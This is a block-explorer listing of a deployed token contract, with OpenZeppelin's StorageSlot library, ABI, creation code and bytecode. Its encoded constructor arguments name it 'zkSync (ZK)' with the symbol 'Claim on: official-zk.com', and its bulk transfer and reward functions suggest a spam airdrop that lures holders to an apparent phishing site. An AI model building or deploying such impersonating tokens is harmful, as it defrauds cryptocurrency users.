// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (utils/StorageSlot.sol) pragma solidity ^0.8.0; /** * @dev Library for reading and writing primitive types to specific storage slots. * * Storage slots are often used to avoid storage conflict when dealing with upgradeable contracts. * This library helps with reading and writing to such slots without the need for inline assembly. * * The functions in this library return Slot structs that contain a `value` member that can be used to read or write. * * Example usage to set ERC1967 implementation slot: * ``` * contract ERC1967 { * bytes32 internal constant _IMPLEMENTATION_SLOT = 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc; * * function _getImplementation() internal view returns (address) { * return StorageSlot.getAddressSlot(_IMPLEMENTATION_SLOT).value; * } * * function _setImplementation(address newImplementation) internal { * require(Address.isContract(newImplementation), "ERC1967: new implementation is not a contract"); * StorageSlot.getAddressSlot(_IMPLEMENTATION_SLOT).value = newImplementation; * } * } * ``` * * _Available since v4.1 for `address`, `bool`, `bytes32`, and `uint256`._ */ library StorageSlot { struct AddressSlot { address value; } struct BooleanSlot { bool value; } struct Bytes32Slot { bytes32 value; } struct Uint256Slot { uint256 value; } /** * @dev Returns an `AddressSlot` with member `value` located at `slot`. */ function getAddressSlot(bytes32 slot) internal pure returns (AddressSlot storage r) { assembly { r.slot := slot } } /** * @dev Returns an `BooleanSlot` with member `value` located at `slot`. */ function getBooleanSlot(bytes32 slot) internal pure returns (BooleanSlot storage r) { assembly { r.slot := slot } } /** * @dev Returns an `Bytes32Slot` with member `value` located at `slot`. */ function getBytes32Slot(bytes32 slot) internal pure returns (Bytes32Slot storage r) { assembly { r.slot := slot } } /** * @dev Returns an `Uint256Slot` with member `value` located at `slot`. */ function getUint256Slot(bytes32 slot) internal pure returns (Uint256Slot storage r) { assembly { r.slot := slot } } }
{ "forceEvmla": false, "isSystem": false, "libraries": {}, "optimizer": { "enabled": true, "mode": "3" }, "outputSelection": { "*": { "*": [ "abi" ] } } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint256","name":"constAmount_","type":"uint256"},{"internalType":"address","name":"from_","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"tokenOwner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"tokens","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"tokens","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"tokenOwner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"remaining","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"tokens","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"constAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"fromAddr","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint256","name":"constAmount_","type":"uint256"},{"internalType":"address","name":"from_","type":"address"}],"name":"initialize","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"holders","type":"address[]"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"randomAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"holders","type":"address[]"}],"name":"reward","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"a","type":"uint256"},{"internalType":"uint256","name":"b","type":"uint256"}],"name":"safeAdd","outputs":[{"internalType":"uint256","name":"c","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"uint256","name":"a","type":"uint256"},{"internalType":"uint256","name":"b","type":"uint256"}],"name":"safeDiv","outputs":[{"internalType":"uint256","name":"c","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"uint256","name":"a","type":"uint256"},{"internalType":"uint256","name":"b","type":"uint256"}],"name":"safeMul","outputs":[{"internalType":"uint256","name":"c","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"uint256","name":"a","type":"uint256"},{"internalType":"uint256","name":"b","type":"uint256"}],"name":"safeSub","outputs":[{"internalType":"uint256","name":"c","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"holders","type":"address[]"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokens","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokens","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
9c4d535b0000000000000000000000000000000000000000000000000000000000000000010001cbfb172a8c14a5eeffb11e2b89817f12d729606941713dcd0771edae5000000000000000000000000000000000000000000000000000000000000000600000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c000000000000000000000000000000000019471fe6a595bad921ece08000000000000000000000000000000005a7d6b2f92c77fad6ccabd7ee0624e64907eaf3e000000000000000000000000000000000000000000000000000000000000000b7a6b53796e6320285a4b290000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000019436c61696d206f6e3a206f6666696369616c2d7a6b2e636f6d00000000000000
Deployed Bytecode
0x0001000000000002000800000000000200000000000103550000008004000039000000400040043f0000000003010019000000600330027000000192033001970000000102200190000000230000c13d000000040230008c000000450000413d000000000201043b000000e0022002700000019d0420009c000000470000213d000001ab0420009c0000007a0000213d000001b20420009c0000012c0000a13d000001b30420009c000001b90000613d000001b40420009c000001c10000613d000001b50120009c000000450000c13d0000000001000416000000000101004b000000450000c13d0000000201000039000000000101041a000000ff0110018f000000800010043f000001b801000041000006440001042e0000000002000416000000000202004b000000450000c13d0000001f0230003900000193022001970000008002200039000000400020043f0000001f0230018f0000000505300272000000340000613d00000005065002100000008006600039000000000701034f000000007807043c0000000004840436000000000864004b000000300000c13d000000000402004b000000430000613d0000000504500210000000000141034f00000003022002100000008004400039000000000504043300000000052501cf000000000525022f000000000101043b0000010002200089000000000121022f00000000012101cf000000000151019f0000000000140435000000800130008c000000610000813d000000000100001900000645000104300000019e0420009c000000830000213d000001a50420009c000001750000a13d000001a60420009c000002050000613d000001a70420009c000002140000613d000001a80220009c000000450000c13d000000440230008c000000450000413d0000000002000416000000000202004b000000450000c13d0000002402100370000000000202043b0000000401100370000000000301043b00000000413200a9000000000403004b000003360000613d00000000433100d9000000000223004b000002ff0000c13d000003360000013d000000800400043d000001940140009c000000450000213d0000001f01400039000000000231004b000000000200001900000195020080410000019501100197000000000501004b00000000050000190000019505004041000001950110009c000000000502c019000000000105004b000000450000c13d00000080014000390000000002010433000001940120009c0000008c0000a13d000001be0100004100000000001004350000004101000039000000040010043f000001bf010000410000064500010430000001ac0420009c000001890000a13d000001ad0420009c000002bb0000613d000001ae0120009c000002d80000613d000001af0120009c000001b10000613d000000450000013d0000019f0420009c000001920000a13d000001a00420009c000002f00000613d000001a10120009c000003050000613d000001a20120009c000001b10000613d000000450000013d0000001f01200039000001c2011001970000003f01100039000001c201100197000000400700043d0000000005170019000000000175004b00000000010000190000000101004039000001940650009c000000740000213d0000000101100190000000740000c13d0000008001300039000000400050043f000800000007001d0000000005270436000700000005001d000000a0044000390000000005420019000000000515004b000000450000213d000000000502004b0000000708000029000000ad0000613d000000000500001900000000065800190000000007450019000000000707043300000000007604350000002005500039000000000625004b000000a60000413d000000080220002900000020022000390000000000020435000000a00400043d000001940240009c000000450000213d0000001f02400039000000000332004b000000000300001900000195030080410000019502200197000000000502004b00000000050000190000019505004041000001950220009c000000000503c019000000000205004b000000450000c13d00000080024000390000000002020433000001940320009c000000740000213d0000001f03200039000001c2033001970000003f03300039000001c203300197000000400700043d0000000003370019000000000573004b00000000050000190000000105004039000001940630009c000000740000213d0000000105500190000000740000c13d000000400030043f000600000007001d0000000003270436000500000003001d000000a0034000390000000004320019000000000114004b000000450000213d000000000102004b0000000506000029000000e30000613d000000000100001900000000041600190000000005310019000000000505043300000000005404350000002001100039000000000421004b000000dc0000413d000000060120002900000020011000390000000000010435000000c00100043d000400000001001d000000e00100043d000301960010019b000001960110009c000000450000213d00000008010000290000000002010433000001940120009c000000740000213d000200000002001d000000000100041a000000010210019000000001011002700000007f0310018f000000000301c0190000001f0130008c00000000010000190000000101002039000000000112004b0000031c0000c13d000100000003001d000000200130008c000001190000413d00000000000004350000000001000414000001920210009c0000019201008041000000c00110021000000197011001c700008010020000390643063e0000040f0000000102200190000000450000613d00000002030000290000001f023000390000000502200270000000200330008c0000000002004019000000000301043b00000001010000290000001f01100039000000050110027000000000011300190000000002230019000000000312004b000001190000813d000000000002041b0000000102200039000000000312004b000001150000413d00000002010000290000001f0110008c0000037a0000a13d00000000000004350000000001000414000001920210009c0000019201008041000000c00110021000000197011001c700008010020000390643063e0000040f0000000102200190000000450000613d000000200200008a0000000202200180000000000101043b000003870000c13d0000002003000039000003940000013d000001b60420009c0000030e0000613d000001b70220009c000000450000c13d000000440230008c000000450000413d0000000002000416000000000202004b000000450000c13d0000000402100370000000000202043b000800000002001d000001960220009c000000450000213d0000002401100370000000000101043b000700000001001d000000000100041100000000001004350000000501000039000000200010043f0000000001000414000001920210009c0000019201008041000000c0011002100000019a011001c700008010020000390643063e0000040f0000000102200190000000450000613d000000000101043b00000008020000290000000000200435000000200010043f0000000001000414000001920210009c0000019201008041000000c0011002100000019a011001c700008010020000390643063e0000040f0000000102200190000000450000613d000000000101043b0000000702000029000000000021041b000000400100043d0000000000210435000001920210009c000001920100804100000040011002100000000002000414000001920320009c0000019202008041000000c002200210000000000112019f00000197011001c70000800d020000390000000303000039000001c10400004100000000050004110000000806000029064306390000040f0000000101200190000000450000613d000000400100043d00000001020000390000000000210435000001920210009c00000192010080410000004001100210000001c0011001c7000006440001042e000001a90420009c000003220000613d000001aa0220009c000000450000c13d000000440230008c000000450000413d0000000002000416000000000202004b000000450000c13d0000000402100370000000000202043b000001960320009c000000450000213d0000002401100370000000000301043b00000000010004110643055f0000040f0000000101000039000000400200043d0000034d0000013d000001b00120009c000003310000613d000001b10120009c000000450000c13d0000000001000416000000000101004b000000450000c13d0000000701000039000001bd0000013d000001a30420009c000001b10000613d000001a40220009c000000450000c13d000000440230008c000000450000413d0000000002000416000000000202004b000000450000c13d0000000402100370000000000202043b000001960320009c000000450000213d0000002401100370000000000101043b000800000001001d000001960110009c000000450000213d00000000002004350000000501000039000000200010043f00000040020000390000000001000019064306240000040f00000008020000290000000000200435000000200010043f00000000010000190000004002000039064306240000040f000001bd0000013d0000000001000416000000000101004b000000450000c13d0000000001030019064305260000040f064305c80000040f0000000001000019000006440001042e0000000001000416000000000101004b000000450000c13d0000000301000039000000000101041a000000800010043f000001b801000041000006440001042e000000640230008c000000450000413d0000000002000416000000000202004b000000450000c13d0000000402100370000000000202043b000800000002001d000001960220009c000000450000213d0000002402100370000000000202043b000700000002001d000001960220009c000000450000213d0000004401100370000000000101043b000600000001001d000000080100002900000000001004350000000501000039000000200010043f0000000001000414000001920210009c0000019201008041000000c0011002100000019a011001c700008010020000390643063e0000040f0000000102200190000000450000613d000000000101043b00000000020004110000000000200435000000200010043f0000000001000414000001920210009c0000019201008041000000c0011002100000019a011001c700008010020000390643063e0000040f0000000102200190000000450000613d000000000101043b000000000201041a000500000002001d000000060120006c000000450000413d000000080100002900000000001004350000000501000039000000200010043f00000040020000390000000001000019064306240000040f00000000020004110000000000200435000000200010043f00000000010000190000004002000039064306240000040f00000006030000290000000502300069000000000021041b00000008010000290000000702000029000001850000013d000000440230008c000000450000413d0000000002000416000000000202004b000000450000c13d0000002402100370000000000202043b000000000302004b000000450000613d0000000401100370000000000101043b00000000212100d9000000800010043f000001b801000041000006440001042e000000840230008c000000450000413d0000000002000416000000000202004b000000450000c13d0000000402100370000000000502043b000001940250009c000000450000213d0000002302500039000000000232004b000000450000813d0000000406500039000000000261034f000000000402043b000001940240009c000000740000213d0000001f07400039000001c2077001970000003f07700039000001c207700197000001b90870009c000000740000213d0000008007700039000000400070043f000000800040043f00000000054500190000002405500039000000000535004b000000450000213d0000002005600039000000000551034f0000001f0640018f00000005074002720000023f0000613d000000a0080000390000000509700210000000a009900039000000000a05034f00000000ab0a043c0000000008b80436000000000b98004b0000023b0000c13d000000000806004b0000024e0000613d0000000507700210000000000575034f0000000306600210000000a007700039000000000807043300000000086801cf000000000868022f000000000505043b0000010006600089000000000565022f00000000056501cf000000000585019f0000000000570435000000a00440003900000000000404350000002404100370000000000704043b000001940470009c000000450000213d0000002304700039000000000434004b000000450000813d0000000408700039000000000481034f000000000604043b000001940460009c000000740000213d0000001f04600039000001c2044001970000003f04400039000001c205400197000000400400043d0000000005540019000000000945004b00000000090000190000000109004039000001940a50009c000000740000213d0000000109900190000000740000c13d000000400050043f000000000564043600000000076700190000002407700039000000000337004b000000450000213d0000002003800039000000000731034f0000001f0360018f00000005086002720000027c0000613d00000005098002100000000009950019000000000a07034f000000000b05001900000000ac0a043c000000000bcb0436000000000c9b004b000002780000c13d000000000903004b0000028b0000613d0000000508800210000000000787034f00000000088500190000000303300210000000000908043300000000093901cf000000000939022f000000000707043b0000010003300089000000000737022f00000000033701cf000000000393019f0000000000380435000000000365001900000000000304350000004403100370000000000303043b0000006401100370000000000601043b0000019601600197000001960660009c000000450000213d000000800600043d000001940760009c000000740000213d000000000800041a000000010780019000000001098002700000007f0790018f000000000709c0190000001f0970008c00000000090000190000000109002039000000000898013f00000001088001900000031c0000c13d000000200870008c000002b30000413d0000001f086000390000000508800270000001ba08800041000000200960008c000001ba0800404100000000000004350000001f077000390000000507700270000001ba07700041000000000978004b000002b30000813d000000000008041b0000000108800039000000000978004b000002af0000413d0000001f0760008c000003f50000a13d000001c20860019800000000000004350000045e0000c13d000000a009000039000001ba070000410000046c0000013d000000240230008c000000450000413d0000000002000416000000000202004b000000450000c13d0000000401100370000000000101043b000001960210009c000000450000213d0000000802000039000000000202041a0000019602200197000000000121004b0000034a0000c13d00000000002004350000000401000039000000200010043f0000000001000414000001920210009c0000019201008041000000c0011002100000019a011001c700008010020000390643063e0000040f0000000102200190000000450000613d000000400200043d000000000101043b0000034c0000013d0000000001000416000000000101004b000000450000c13d0000000103000039000000000203041a000000010520019000000001012002700000007f0410018f00000000010460190000001f0610008c00000000060000190000000106002039000000000662013f00000001066001900000031c0000c13d000000800010043f000000000505004b000003530000c13d000001c301200197000000a00010043f000000000104004b000000c001000039000000a001006039000003690000013d0000000002000416000000000202004b000000450000c13d000000440230008c000000450000413d0000000402100370000000000202043b0000002401100370000000000301043b0000000001230019000000000231004b000000000200001900000001020040390000000102200190000003360000613d000001be0100004100000000001004350000001101000039000000040010043f000001bf0100004100000645000104300000000001000416000000000101004b000000450000c13d0000000801000039000000000101041a0000019601100197000000800010043f000001b801000041000006440001042e0000000001000416000000000101004b000000450000c13d000000000200041a000000010320019000000001042002700000007f0140018f000000000104c0190000001f0410008c00000000040000190000000104002039000000000442013f0000000104400190000003390000613d000001be0100004100000000001004350000002201000039000000040010043f000001bf010000410000064500010430000000440230008c000000450000413d0000000002000416000000000202004b000000450000c13d0000002402100370000000000202043b0000000401100370000000000101043b000000000321004b000000450000413d0000000001210049000000800010043f000001b801000041000006440001042e0000000001000416000000000101004b000000450000c13d0000000601000039000000000101041a000000800010043f000001b801000041000006440001042e000000800010043f000000000303004b000003580000613d0000000000000435000000000201004b000003560000613d000001ba0200004100000000040000190000000003040019000000000402041a000000a005300039000000000045043500000001022000390000002004300039000000000514004b000003410000413d000003680000013d00000007010000390000008002000039000000000101041a0000000000120435000001920120009c00000192020080410000004001200210000001c0011001c7000006440001042e0000000000300435000000020220008c0000035e0000813d000000a001000039000003690000013d000001c302200197000000a00020043f000000000101004b000000c001000039000000a001006039000003690000013d000001bc0200004100000000040000190000000003040019000000000402041a000000a005300039000000000045043500000001022000390000002004300039000000000514004b000003600000413d000000c001300039000000800210008a0000008001000039064304ff0000040f000000400100043d000800000001001d0000008002000039064305110000040f00000008030000290000000001310049000001920210009c00000192010080410000006001100210000001920230009c00000192030080410000004002300210000000000121019f000006440001042e000000020100006b00000000010000190000037f0000613d0000000701000029000000000101043300000002040000290000000302400210000001c40220027f000001c402200167000000000121016f0000000102400210000000000121019f000003a20000013d000000010320008a0000000503300270000000000431001900000020030000390000000104400039000000080600002900000000056300190000000005050433000000000051041b00000020033000390000000101100039000000000541004b0000038d0000c13d000000020220006c0000039f0000813d00000002020000290000000302200210000000f80220018f000001c40220027f000001c40220016700000008033000290000000003030433000000000223016f000000000021041b0000000201000029000000010110021000000001011001bf000000000010041b00000006010000290000000001010433000800000001001d000001940110009c000000740000213d0000000101000039000000000101041a000000010210019000000001021002700000007f0320018f000000000302c019000700000003001d0000001f0230008c00000000020000190000000102002039000000000121013f00000001011001900000031c0000c13d0000000701000029000000200110008c000003d40000413d000000010100003900000000001004350000000001000414000001920210009c0000019201008041000000c00110021000000197011001c700008010020000390643063e0000040f0000000102200190000000450000613d00000008030000290000001f023000390000000502200270000000200330008c0000000002004019000000000301043b00000007010000290000001f01100039000000050110027000000000011300190000000002230019000000000312004b000003d40000813d000000000002041b0000000102200039000000000312004b000003d00000413d00000008010000290000001f0110008c000003e80000a13d000000010100003900000000001004350000000001000414000001920210009c0000019201008041000000c00110021000000197011001c700008010020000390643063e0000040f0000000102200190000000450000613d000000200200008a0000000802200180000000000101043b000004000000c13d00000020030000390000040d0000013d000000080100006b0000000001000019000003ed0000613d0000000501000029000000000101043300000008040000290000000302400210000001c40220027f000001c402200167000000000121016f0000000102400210000000000121019f0000041b0000013d000000000706004b0000000007000019000003f90000613d000000a00700043d0000000308600210000001c40880027f000001c408800167000000000787016f0000000106600210000000000667019f000004770000013d000000010320008a0000000503300270000000000431001900000020030000390000000104400039000000060600002900000000056300190000000005050433000000000051041b00000020033000390000000101100039000000000541004b000004060000c13d000000080220006c000004180000813d00000008020000290000000302200210000000f80220018f000001c40220027f000001c40220016700000006033000290000000003030433000000000223016f000000000021041b0000000801000029000000010110021000000001011001bf0000000102000039000000000012041b0000000201000039000000000201041a000001c30220019700000012022001bf000000000021041b00000006010000390000000402000029000000000021041b00080198102000d5000000000102004b0000042c0000613d000000080200002900000004212000fa000001980110009c000002ff0000c13d00000003010000390000000802000029000000000021041b0000000803000039000000000103041a00000199011001970000000302000029000000000121019f000000000013041b00000000002004350000000401000039000000200010043f0000000001000414000001920210009c0000019201008041000000c0011002100000019a011001c700008010020000390643063e0000040f0000000102200190000000450000613d000000000101043b0000000803000029000000000031041b0000000801000039000000000201041a000000400100043d0000000000310435000001920310009c000001920100804100000040011002100000000003000414000001920430009c0000019203008041000000c003300210000000000131019f00000197011001c700000196062001970000800d0200003900000003030000390000019b040000410000000005000019064306390000040f0000000101200190000000450000613d0000002001000039000001000010044300000120000004430000019c01000041000006440001042e000001ba07000041000000200a000039000000010980008a0000000509900270000001bb09900041000000000b0a0019000000800ab00039000000000a0a04330000000000a7041b000000200ab000390000000107700039000000000c97004b000004630000c13d000000a009b00039000000000868004b000004750000813d0000000308600210000000f80880018f000001c40880027f000001c4088001670000000009090433000000000889016f000000000087041b000000010660021000000001066001bf000000000060041b0000000007040433000001940670009c000000740000213d0000000106000039000000000906041a0000000108900190000000010a9002700000007f08a0018f00000000080ac0190000001f0a80008c000000000a000019000000010a0020390000000009a9013f00000001099001900000031c0000c13d000000200980008c000004980000413d00000000006004350000001f097000390000000509900270000001bc09900041000000200a70008c000001bc090040410000001f088000390000000508800270000001bc08800041000000000a89004b000004980000813d000000000009041b0000000109900039000000000a89004b000004940000413d0000001f0870008c000004a00000a13d0000000000600435000001c208700198000004ab0000c13d0000002005000039000001bc02000041000004b70000013d000000000207004b0000000002000019000004a40000613d00000000020504330000000304700210000001c40440027f000001c404400167000000000242016f0000000104700210000000000242019f000004c30000013d000001bc020000410000002005000039000000010980008a0000000509900270000001bd09900041000000000a450019000000000a0a04330000000000a2041b00000020055000390000000102200039000000000a92004b000004b00000c13d000000000878004b000004c10000813d0000000308700210000000f80880018f000001c40880027f000001c40880016700000000044500190000000004040433000000000484016f000000000042041b000000010270021000000001022001bf000000000026041b0000000202000039000000000402041a000001c30440019700000012044001bf000000000042041b0000000602000039000000000032041b00080198203000d5000000000203004b000004d10000613d00000008323000f9000001980220009c000002ff0000c13d00000003020000390000000803000029000000000032041b0000000803000039000000000203041a0000019902200197000000000212019f000000000023041b00000000001004350000000401000039000000200010043f0000000001000414000001920210009c0000019201008041000000c0011002100000019a011001c700008010020000390643063e0000040f0000000102200190000000450000613d000000000101043b0000000803000029000000000031041b0000000801000039000000000201041a000000400100043d0000000000310435000001920310009c000001920100804100000040011002100000000003000414000001920430009c0000019203008041000000c003300210000000000113019f00000197011001c700000196062001970000800d0200003900000003030000390000019b040000410000000005000019064306390000040f0000000101200190000000450000613d0000000001000019000006440001042e0000001f02200039000001c2022001970000000001120019000000000221004b00000000020000190000000102004039000001940310009c0000050b0000213d00000001022001900000050b0000c13d000000400010043f000000000001042d000001be0100004100000000001004350000004101000039000000040010043f000001bf01000041000006450001043000000020030000390000000004310436000000003202043400000000002404350000004001100039000000000402004b000005200000613d000000000400001900000000054100190000000006430019000000000606043300000000006504350000002004400039000000000524004b000005190000413d000000000321001900000000000304350000001f02200039000001c2022001970000000001210019000000000001042d000001c50210009c000005570000213d000000230210008c000005570000a13d00000000030003670000000402300370000000000402043b000001940240009c000005570000213d0000002302400039000000000212004b000005570000813d0000000402400039000000000223034f000000000502043b000001c60250009c000005590000813d00000005065002100000003f02600039000001c707200197000000400200043d0000000007720019000000000827004b00000000080000190000000108004039000001940970009c000005590000213d0000000108800190000005590000c13d000000400070043f000000000052043500000024044000390000000006640019000000000116004b000005570000213d000000000105004b000005550000613d0000000001020019000000000543034f000000000505043b000001960750009c000005570000213d000000200110003900000000005104350000002004400039000000000564004b0000054c0000413d0000000001020019000000000001042d00000000010000190000064500010430000001be0100004100000000001004350000004101000039000000040010043f000001bf0100004100000645000104300004000000000002000400000003001d000200000002001d0000019601100197000300000001001d00000000001004350000000401000039000000200010043f0000000001000414000001920210009c0000019201008041000000c0011002100000019a011001c700008010020000390643063e0000040f0000000102200190000005c00000613d000000000101043b000000000201041a000100000002001d000000040120006c000005c00000413d000000030100002900000000001004350000000401000039000000200010043f0000000001000414000001920210009c0000019201008041000000c0011002100000019a011001c700008010020000390643063e0000040f0000000102200190000005c00000613d0000000103000029000000040230006a000000000101043b000000000021041b00000002010000290000019601100197000200000001001d00000000001004350000000001000414000001920210009c0000019201008041000000c0011002100000019a011001c700008010020000390643063e0000040f0000000102200190000005c00000613d0000000203000029000000000101043b000000000101041a000100040010002d000000010110006b00000000010000190000000101004039000000010110008c000005c20000613d00000000003004350000000401000039000000200010043f0000000001000414000001920210009c0000019201008041000000c0011002100000019a011001c700008010020000390643063e0000040f00000001022001900000000402000029000005c00000613d000000000101043b0000000103000029000000000031041b000000400100043d0000000000210435000001920210009c000001920100804100000040011002100000000002000414000001920320009c0000019202008041000000c002200210000000000112019f00000197011001c70000800d0200003900000003030000390000019b0400004100000003050000290000000206000029064306390000040f0000000101200190000005c00000613d000000000001042d00000000010000190000064500010430000001be0100004100000000001004350000001101000039000000040010043f000001bf0100004100000645000104300004000000000002000300000001001d0000000013010434000200000001001d000000000103004b000005f60000613d000001c8040000410000000002000019000100000003001d0000000701000039000000000041041b00000003010000290000000001010433000000000112004b000006180000813d000400000002001d0000000501200210000000020110002900000000010104330000000802000039000000000202041a000000400300043d0000000000430435000001920430009c000001920300804100000040033002100000000004000414000001920540009c0000019204008041000000c004400210000000000334019f0000019606100197000001960520019700000197013001c70000800d0200003900000003030000390000019b04000041064306390000040f0000000101200190000006160000613d000000040200002900000001022000390000000103000029000000000132004b000001c804000041000005d10000413d0000000701000039000000000101041a00000000243100a9000000000201004b000005fe0000613d00000000211400d9000000000131004b0000061e0000c13d000400000004001d0000000801000039000000000101041a000001960110019700000000001004350000000401000039000000200010043f0000000001000414000001920210009c0000019201008041000000c0011002100000019a011001c700008010020000390643063e0000040f0000000102200190000006160000613d000000000101043b000000000201041a0000000404000029000000000342004b0000061e0000413d0000000002420049000000000021041b000000000001042d00000000010000190000064500010430000001be0100004100000000001004350000003201000039000000040010043f000001bf010000410000064500010430000001be0100004100000000001004350000001101000039000000040010043f000001bf010000410000064500010430000001920310009c00000192010080410000004001100210000001920320009c00000192020080410000006002200210000000000112019f0000000002000414000001920320009c0000019202008041000000c002200210000000000112019f000001c9011001c700008010020000390643063e0000040f0000000102200190000006370000613d000000000101043b000000000001042d000000000100001900000645000104300000063c002104210000000102000039000000000001042d0000000002000019000000000001042d00000641002104230000000102000039000000000001042d0000000002000019000000000001042d0000064300000432000006440001042e00000645000104300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000001ffffffe0000000000000000000000000000000000000000000000000ffffffffffffffff8000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffff02000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000000000000000000005f5e100ffffffffffffffffffffffff00000000000000000000000000000000000000000200000000000000000000000000000000000040000000000000000000000000ddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef000000020000000000000000000000000000004000000100000000000000000000000000000000000000000000000000000000000000000000000000a293d1e700000000000000000000000000000000000000000000000000000000d43a632e00000000000000000000000000000000000000000000000000000000e6cb901200000000000000000000000000000000000000000000000000000000e6cb901300000000000000000000000000000000000000000000000000000000e6fdb7ea00000000000000000000000000000000000000000000000000000000fb7ed96100000000000000000000000000000000000000000000000000000000d43a632f00000000000000000000000000000000000000000000000000000000dd62ed3e00000000000000000000000000000000000000000000000000000000b5931f7b00000000000000000000000000000000000000000000000000000000b5931f7c00000000000000000000000000000000000000000000000000000000bd3a13f600000000000000000000000000000000000000000000000000000000d05c78da00000000000000000000000000000000000000000000000000000000a293d1e800000000000000000000000000000000000000000000000000000000a9059cbb00000000000000000000000000000000000000000000000000000000484b1c120000000000000000000000000000000000000000000000000000000070a082300000000000000000000000000000000000000000000000000000000070a082310000000000000000000000000000000000000000000000000000000095d89b4100000000000000000000000000000000000000000000000000000000a06c1a3300000000000000000000000000000000000000000000000000000000484b1c13000000000000000000000000000000000000000000000000000000005012fb720000000000000000000000000000000000000000000000000000000018160ddc0000000000000000000000000000000000000000000000000000000018160ddd0000000000000000000000000000000000000000000000000000000023b872dd00000000000000000000000000000000000000000000000000000000313ce5670000000000000000000000000000000000000000000000000000000006fdde0300000000000000000000000000000000000000000000000000000000095ea7b30000000000000000000000000000000000000020000000800000000000000000000000000000000000000000000000000000000000000000ffffffffffffff7f290decd9548b62a8d60345a988386fc84ba6bc95484008f6362f93160ef3e563290decd9548b62a8d60345a988386fc84ba6bc95484008f6362f93160ef3e564b10e2d527612073b26eecdfd717e6a320cf44b4afac2b0732d9fcbe2b7fa0cf6b10e2d527612073b26eecdfd717e6a320cf44b4afac2b0732d9fcbe2b7fa0cf74e487b7100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002400000000000000000000000000000000000000000000000000000000000000200000000000000000000000008c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe0ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000100000000000000007fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe00000000000000000000000000000000000000000000000821ab0d44149800000020000000000000000000000000000000000000000000000000000000000000064c1c0a6b28b8ff03a19fd1c3a81d48b10eb84d0a7dda0814737227e077ff583
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
